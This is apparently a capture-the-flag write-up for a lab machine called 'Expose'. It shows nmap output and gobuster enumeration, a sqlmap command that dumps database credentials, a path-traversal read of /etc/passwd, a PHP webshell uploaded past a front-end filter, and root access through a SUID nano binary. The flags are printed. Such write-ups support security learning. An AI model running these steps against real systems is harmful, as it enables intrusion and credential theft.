About : Use your red teaming knowledge to pwn a Linux machine.
This challenge is an initial test to evaluate your capabilities in red teaming skills. Start the VM by clicking the Start Machine button at the top right of the task. You will find all the necessary tools to complete the challenge, like Nmap, sqlmap, wordlists, PHP shell, and many more in the AttackBox.
Exposing unnecessary services in a machine can be dangerous. Can you capture the flags and pwn the machine?
Given that it is a dedicated VM for the room, I can do a somewhat brutal network scan
21/tcp open ftp syn-ack ttl 64 vsftpd 2.0.8 or later
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:10.10.112.103
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 2
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open ssh syn-ack ttl 64 OpenSSH 8.2p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
53/tcp open domain syn-ack ttl 64 ISC BIND 9.16.1-Ubuntu
| dns-nsid:
|_ bind.version: 9.16.1-Ubuntu
1337/tcp open http syn-ack ttl 64 Apache httpd 2.4.41 ((Ubuntu))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: EXPOSED
1883/tcp open mosquitto version 1.6.9 syn-ack ttl 64
| mqtt-subscribe:
| Topics and their most recent payloads:
| $SYS/broker/load/bytes/sent/15min: 0.27
| $SYS/broker/bytes/received: 18
| $SYS/broker/version: mosquitto version 1.6.9
| $SYS/broker/clients/inactive: 0
| $SYS/broker/load/sockets/5min: 0.20
| $SYS/broker/load/bytes/sent/1min: 3.65
| $SYS/broker/load/messages/sent/5min: 0.20
| $SYS/broker/heap/maximum: 49688
| $SYS/broker/clients/disconnected: 0
| $SYS/broker/load/bytes/received/15min: 1.19
| $SYS/broker/messages/sent: 1
| $SYS/broker/clients/active: 0
| $SYS/broker/store/messages/bytes: 180
| $SYS/broker/heap/current: 47240
| $SYS/broker/load/messages/sent/1min: 0.91
| $SYS/broker/load/sockets/1min: 0.76
| $SYS/broker/load/bytes/received/5min: 3.53
| $SYS/broker/uptime: 1276 seconds
| $SYS/broker/messages/received: 1
| $SYS/broker/load/messages/received/15min: 0.07
| $SYS/broker/load/connections/5min: 0.20
| $SYS/broker/load/messages/received/5min: 0.20
| $SYS/broker/load/connections/15min: 0.07
| $SYS/broker/load/messages/received/1min: 0.91
| $SYS/broker/load/messages/sent/15min: 0.07
| $SYS/broker/clients/connected: 0
| $SYS/broker/load/connections/1min: 0.91
| $SYS/broker/bytes/sent: 4
| $SYS/broker/load/sockets/15min: 0.07
| $SYS/broker/load/bytes/sent/5min: 0.79
|_ $SYS/broker/load/bytes/received/1min: 16.45
So we got :
Lets take a look at the FTP :
ftp 10.10.228.106
Name : anonymous
Password :
dir
-> nothing :c
Having a look on apache give us more intel:
gobuster dir -u http://10.10.228.106:1337 -w /usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt
/.hta (Status: 403)
/.htaccess (Status: 403)
/.htpasswd (Status: 403)
/admin (Status: 301)
/index.php (Status: 200)
/javascript (Status: 301)
/phpmyadmin (Status: 301)
/server-status (Status: 403)
The /admin show us a login page but the button "Continue" is a fake one
But we found a /phpmyadmin page.
Playing around /admin reveal more info :
http://10.10.228.106:1337/admin/modules/ -> index enabled
footer.php
header.php
After few attemps and messing with the FTP and DNS server, I retry to go with apache/gobuster cause the message "Is this the right admin portal?" trigerred me.
Running big.txt reveal another admin page /admin_101 and this time "Continue" button works and username is preffiled with "hacker@root.thm".
Looking at the request, when sending a login attemps we got a error :
messages [ "SELECT * FROM user WHERE email = 'hacker@root.thm'" ]
Username input is only locked in front but I can send another username.
Lets try sqlmap so :
sqlmap --random-agent -u http://10.10.228.106:1337/admin_101/includes/user_login.php --data "email=aaaa&password=a" -p "email" --dump
Database: expose
Table: config
[2 entries]
+----+------------------------------+-----------------------------------------------------+
| id | url | password |
+----+------------------------------+-----------------------------------------------------+
| 1 | /file1010111/index.php | 69c66901194a6486176e81f5945b8929 (easytohack) |
| 3 | /upload-cv00101011/index.php | // ONLY ACCESSIBLE THROUGH USERNAME STARTING WITH Z |
+----+------------------------------+-----------------------------------------------------+
Table: user
[4 entries]
+--------------------------------------+--------------------------------------+--------------------------------------+--------------------------------------+
| id | email | created | password |
+--------------------------------------+--------------------------------------+--------------------------------------+--------------------------------------+
| 2023-02-21 09:05:46 | 2023-02-21 09:05:46 | 2023-02-21 09:05:46 | 2023-02-21 09:05:46 |
| hacker@root.thm | hacker@root.thm | hacker@root.thm | hacker@root.thm |
| 1 | 1 | 1 | 1 |
| VeryDifficultPassword!!#@#@!#!@#1231 | VeryDifficultPassword!!#@#@!#!@#1231 | VeryDifficultPassword!!#@#@!#!@#1231 | VeryDifficultPassword!!#@#@!#!@#1231 |
+--------------------------------------+--------------------------------------+--------------------------------------+--------------------------------------+
I manage to login on http://10.10.228.106:1337/admin_101 with hacker@root.thm and VeryDifficultPassword!!#@#@!#!@#1231.
This give access to http://10.10.228.106:1337/admin_101/chat.php but the website say "We're trying to resolve this issue as soon as possible
And http://10.10.228.106:1337/file1010111/index.php with password easytohack password, this time the website say :
Parameter Fuzzing is also important :) or Can you hide DOM elements?
and looking at the source page we get a hind sayings to use "file" as a parameters for the page.
Seems like we can get file :
http://10.10.228.106:1337/file1010111/index.php?file=../../../../../etc/passwd
The other page we got before told us to login with only a username but need to start with "z"
http://10.10.228.106:1337/upload-cv00101011/index.php
Using user "zeamkish" from the passwd file we can loggin and here is a web page who let us upload file.
I upload a png file to test :
http://10.10.228.106:1337/upload-cv00101011/upload_thm_1001/thm-ab-bg-1803.png
The front does not want me to upload php file, I just edit my png upload and update name and content and letsgo :
http://10.10.228.106:1337/upload-cv00101011/upload_thm_1001/thm-ab-bg-1803.php?cmd=id
Using this webshell I found the file "ssh_creds.txt" in zeamkish file, it give us username and password to login with SSH on the server.
First flag : THM{USER_FLAG_1231_EXPOSE}
Now I want root !
I find a suid on nano :
-rwsr-xr-x 1 root root 320136 Apr 10 2020 /usr/bin/nano
So I can just edit any fill I want, ow glad.
nano /root/flag.txt
Give us the last flag :
THM{ROOT_EXPOSED_1001}
